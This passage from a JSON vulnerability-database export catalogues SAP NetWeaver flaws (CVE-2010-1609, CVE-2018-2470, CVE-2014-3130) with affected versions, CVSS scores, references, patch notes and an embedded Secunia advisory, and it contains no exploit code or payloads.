"data": "Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NetWeaver is prone to a cross-site scripting vulnerability. ----------------------------------------------------------------------\n\n\n\nSecunia integrated with Microsoft WSUS \nhttp://secunia.com/blog/71/\n\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver WebDynpro Runtime Cross-Site Scripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA38629\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/38629/\n\nDESCRIPTION:\nMariano Nu\\xf1ez Di Croce has reported a vulnerability in SAP NetWeaver,\nwhich can be exploited by malicious people to conduct cross-site\nscripting attacks. \n\nCertain unspecified input passed to the WebDynpro Runtime is not\nproperly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user\u0027s\nbrowser session in context of an affected site. \n\nThe vulnerability is reported in SAP NetWeaver 2004 prior to SP21 and\nSAP NetWeaver 2004s prior to SP13. \n\nSOLUTION:\nPatches are available via SAP Note 1424863. \nhttps://service.sap.com/sap/support/notes/1424863\n\nPROVIDED AND/OR DISCOVERED BY:\nMariano Nu\\xf1ez Di Croce, Onapsis\n\nORIGINAL ADVISORY:\nOnapsis:\nhttp://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html\n\nSAP Note 1424863:\nhttps://service.sap.com/sap/support/notes/1424863\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "BID",
"id": "73745"
},
{
"db": "PACKETSTORM",
"id": "86389"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-1609",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "38629",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0397",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005438",
"trust": 0.8
},
{
"db": "FULLDISC",
"id": "20100211 [ONAPSIS SECURITY ADVISORY 2010-003] SAP WEBDYNPRO RUNTIME XSS/CSS INJECTION",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20100211 [ONAPSIS SECURITY ADVISORY 2010-003] SAP WEBDYNPRO RUNTIME XSS/CSS INJECTION",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498",
"trust": 0.6
},
{
"db": "BID",
"id": "73745",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "86389",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "73745"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "PACKETSTORM",
"id": "86389"
},
{
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"id": "VAR-201004-0451",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:39:08.157000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NetWeaver",
"trust": 0.8,
"url": "http://scn.sap.com/community/netweaver"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "NVD",
"id": "CVE-2010-1609"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/38629"
},
{
"trust": 1.6,
"url": "http://www.vupen.com/english/advisories/2010/0397"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/509499/100/0/threaded"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/509499/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1609"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-1609"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/71/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/38629/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1424863"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "BID",
"id": "73745"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "PACKETSTORM",
"id": "86389"
},
{
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "73745"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "PACKETSTORM",
"id": "86389"
},
{
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-04-29T00:00:00",
"db": "BID",
"id": "73745"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"date": "2010-02-16T17:07:07",
"db": "PACKETSTORM",
"id": "86389"
},
{
"date": "2010-04-29T17:30:00.870000",
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"date": "2010-04-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-04-29T00:00:00",
"db": "BID",
"id": "73745"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"date": "2018-10-10T19:57:36.637000",
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"date": "2010-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "86389"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
],
"trust": 0.7
}
}
var-201810-1087
Vulnerability from variot
In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP NetWeaver AS ABAP 7.0 through 7.02, 7.30, 7.31, 7.40 and 7.50 through 7.53 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1087",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.02 for up to 7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.50 to 7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.52"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.51"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.52"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "105551"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.53",
"versionStartIncluding": "7.50",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2470"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "105551"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2470",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2470",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2470",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2470",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-449",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-2470",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-2470"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nSAP NetWeaver AS ABAP 7.0 through 7.02, 7.30, 7.31, 7.40 and 7.50 through 7.53 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "BID",
"id": "105551"
},
{
"db": "VULMON",
"id": "CVE-2018-2470"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2470",
"trust": 2.8
},
{
"db": "BID",
"id": "105551",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-2470",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-2470"
},
{
"db": "BID",
"id": "105551"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"id": "VAR-201810-1087",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:13:39.029000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "October 2018 (2684760)",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=500633095"
},
{
"title": "SAP NetWeaver Application Server for ABAP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=85640"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "NVD",
"id": "CVE-2018-2470"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=500633095"
},
{
"trust": 2.0,
"url": "https://launchpad.support.sap.com/#/notes/2684760"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/105551"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2470"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2470"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-2470"
},
{
"db": "BID",
"id": "105551"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-2470"
},
{
"db": "BID",
"id": "105551"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2018-2470"
},
{
"date": "2018-10-09T00:00:00",
"db": "BID",
"id": "105551"
},
{
"date": "2018-12-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"date": "2018-10-09T13:29:01.633000",
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-26T00:00:00",
"db": "VULMON",
"id": "CVE-2018-2470"
},
{
"date": "2018-10-09T00:00:00",
"db": "BID",
"id": "105551"
},
{
"date": "2018-12-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010819"
},
{
"date": "2018-11-26T15:28:03.913000",
"db": "NVD",
"id": "CVE-2018-2470"
},
{
"date": "2018-10-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server for ABAP Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010819"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-449"
}
],
"trust": 0.6
}
}
var-201404-0530
Vulnerability from variot
The ABAP Help documentation and translation tools (BC-DOC-HLP) in Basis in SAP Netweaver ABAP Application Server does not properly restrict access, which allows local users to gain privileges and execute ABAP instructions via crafted help messages. SAP BASIS is prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and to gain unauthorized actions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201404-0530",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver abap application server",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver application server abap",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "67304"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"configurations": {
"@context": {
